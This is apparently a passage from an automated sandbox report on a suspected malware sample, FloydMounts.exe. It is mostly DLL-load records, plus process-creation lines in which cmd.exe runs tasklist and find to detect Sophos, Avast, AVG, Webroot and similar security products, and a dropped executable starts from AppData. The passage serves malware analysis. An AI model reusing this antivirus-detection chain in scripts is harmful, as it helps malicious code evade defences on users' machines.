              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe "C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
